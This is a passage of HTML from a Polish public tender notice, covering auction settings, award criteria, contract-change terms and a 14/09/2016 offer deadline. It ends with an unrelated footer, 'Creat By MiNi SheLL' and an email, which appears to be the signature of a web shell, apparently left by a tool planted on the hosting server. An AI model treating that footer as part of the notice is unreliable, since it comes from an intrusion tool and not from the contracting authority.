                  Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                  <br />
                  nie
                  <br />
                  Informacje dodatkowe:
                  <br />
                  <br />
                  Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                  <br />
                  nie
                  <br />
                  Informacje dodatkowe:
                  <br />
                  <br />
                  W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                  <br />
                  nie
                  <br />
                  Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                  <br />
                  nie
               </div>
               <br />
               <b>IV.1.8) Aukcja elektroniczna</b>
               <br />
               <b>Przewidziane jest przeprowadzenie aukcji elektronicznej</b>
               <i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem)</i>
               nie
               <br />
               <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej:</b>
               <br />
               <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b>
               <br />
               nie
               <br />
               Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
               <br />
               Informacje dotyczące przebiegu aukcji elektronicznej:
               <br />
               Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień):
               <br />
               Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
               <br />
               Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej:
               <br />
               Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania:
               <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table>
                     <tr>
                        <td>etap nr</td>
                        <td>czas trwania etapu</td>
                     </tr>
                     <tr>
                        <td />
                        <td />
                     </tr>
                  </table>
                  <br />
                  Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                  <br />
                  Warunki zamknięcia aukcji elektronicznej:
                  <br />
               </div>
               <br />
               <b>IV.2) KRYTERIA OCENY OFERT</b>
               <br />
               <b>IV.2.1) Kryteria oceny ofert:</b>
               <br />
               <b>IV.2.2) Kryteria</b>
               <br />
               <div style="padding-left: 20px">
                  <table>
                     <tr>
                        <td>
                           <i>Kryteria</i>
                        </td>
                        <td>
                           <i>Znaczenie</i>
                        </td>
                     </tr>
                     <tr>
                        <td>Cena</td>
                        <td>60</td>
                     </tr>
                  </table>
               </div>
               <br />
               <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp</b>
               (przetarg nieograniczony)
               <br />
               nie
               <br />
               <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne</b>
               <br />
               <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b>
               <br />
               Minimalne wymagania, które muszą spełniać wszystkie oferty:
               <br />
               <br />
               Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
               <br />
               Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
               <br />
               Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
               <br />
               <br />
               Informacje dodatkowe
               <br />
               <br />
               <br />
               <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b>
               <br />
               Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
               <br />
               <br />
               Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
               <br />
               <br />
               Wstępny harmonogram postępowania:
               <br />
               <br />
               Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
               <br />
               Należy podać informacje na temat etapów dialogu:
               <br />
               <br />
               <br />
               Informacje dodatkowe:
               <br />
               <br />
               <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b>
               <br />
               Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
               <br />
               <br />
               Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
               <br />
               nie
               <br />
               Informacje dodatkowe:
               <br />
               <br />
               <b>IV.4) Licytacja elektroniczna</b>
               <br />
               Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
               <br />
               <div style="padding-left: 20px" />
               Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
               <br />
               <div style="padding-left: 20px" />
               Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
               <br />
               <div style="padding-left: 20px" />
               Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
               <br />
               <div style="padding-left: 20px" />
               Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:
               <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table>
                     <tr>
                        <td>etap nr</td>
                        <td>czas trwania etapu</td>
                     </tr>
                     <tr>
                        <td />
                        <td />
                     </tr>
                  </table>
                  <br />
                  Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
               </div>
               Termin otwarcia licytacji elektronicznej:
               <br />
               <div style="padding-left: 20px" />
               Termin i warunki zamknięcia licytacji elektronicznej:
               <br />
               <div style="padding-left: 20px" />
               <br />
               Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
               <br />
               <div style="padding-left: 20px" />
               <br />
               Wymagania dotyczące zabezpieczenia należytego wykonania umowy:
               <br />
               <div style="padding-left: 20px" />
               <br />
               Informacje dodatkowe:
               <br />
               <div style="padding-left: 20px" />
               <b>IV.5) ZMIANA UMOWY</b>
               <br />
               <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
               tak
               <br />
               Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
               <br />
               1.Wszystkie zmiany niniejszej umowy mogą być dokonane jedynie za zgodą obu stron w formie pisemnej pod rygorem nieważności.
    2.Na podstawie art. 144 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy oraz określa warunki tych zmian:
    1)	Wynagrodzenie Wykonawcy może być zmienione:
    a)gdy nastąpi zmiana stawki podatku VAT,
    b)w przypadku zastosowania procedury określonej w § 7 umowy.
    2)Termin wykonania umowy może być zmieniony o czas opóźnienia, jeżeli opóźnienie będzie miało wpływ na wykonanie umowy w następujących przypadkach :
    a)jeżeli w trakcie budowy zaszła konieczność wykonania nieprzewidzianych robót lub Zamawiający dokonał istotnej zmiany projektu,
    b)w przypadku wstrzymania realizacji umowy przez właściwe organy administracji publicznej, z przyczyn nie leżących po stronie Wykonawcy,
    c)działania siły wyższej,
    d)przestojów i opóźnień zawinionych przez Zamawiającego,
    e)wstrzymania robót przez Zamawiającego z przyczyn od niego niezależnych,
    f)w przypadku wykazania i udokumentowania przez Wykonawcę, iż
    z przyczyn niezależnych od niego dostawa części niezbędnych do wykonania przedmiotu umowy nie mogła być zrealizowana w terminie określonym w ust. 2  jednakże nie dłużej niż o 14 dni,
    g)w przypadku wydania przez klasyfikatora dodatkowych zaleceń, które wynikły w trakcie przeglądu.
               <br />
               <b>IV.6) INFORMACJE ADMINISTRACYJNE</b>
               <br />
               <br />
               <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym</b>
               <i>(jeżeli dotyczy):</i>
               <br />
               <br />
               <b>Środki służące ochronie informacji o charakterze poufnym</b>
               <br />
               <br />
               <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu:</b>
               <br />
               Data: 14/09/2016, godzina: 10:30,
               <br />
               Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
               <br />
               nie
               <br />
               Wskazać powody:
               <br />
               <br />
               Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
               <br />
               &gt;
              polski
               <br />
               <b>IV.6.3) Termin związania ofertą:</b>
               okres w dniach: 30 (od ostatecznego terminu składania ofert)
               <br />
               <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
               tak
               <br />
               <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
               nie
               <br />
               <b>IV.6.6) Informacje dodatkowe:</b>
               <br />
            </div>
         </div>
         <div style="text-align: center" class="headerLarge_xforms">
            <u>ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</u>
         </div>
         <div>
            <b>Część nr:</b>
              
            <b>Nazwa:</b>
            <br />
            <div style="padding-left: 20px">
               <b>1) Krótki opis przedmiotu zamówienia</b>
               <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i>
               <b>a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
               <br />
               <b>2) Wspólny Słownik Zamówień (CPV):</b>
               <br />
               <b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b>
               <br />
               Wartość bez VAT:
               <br />
               Waluta:
               <br />
               <div style="padding-left: 20px">
                  <br />
                  <b>4) Czas trwania lub termin wykonania:</b>
                  okres w dniach: 56
                  <br />
                  <b>5) Kryteria oceny ofert:</b>
                  <table style="padding-left: 20px">
                     <tr>
                        <td>
                           <i>Kryteria</i>
                        </td>
                        <td>
                           <i>Znaczenie</i>
                        </td>
                     </tr>
                     <tr>
                        <td />
                        <td />
                     </tr>
                  </table>
                  <b>6) INFORMACJE DODATKOWE:</b>
                  <br />
               </div>
            </div>
            <br />
         </div>
      </div>
   

Creat By MiNi SheLL
Email: jattceo@gmail.com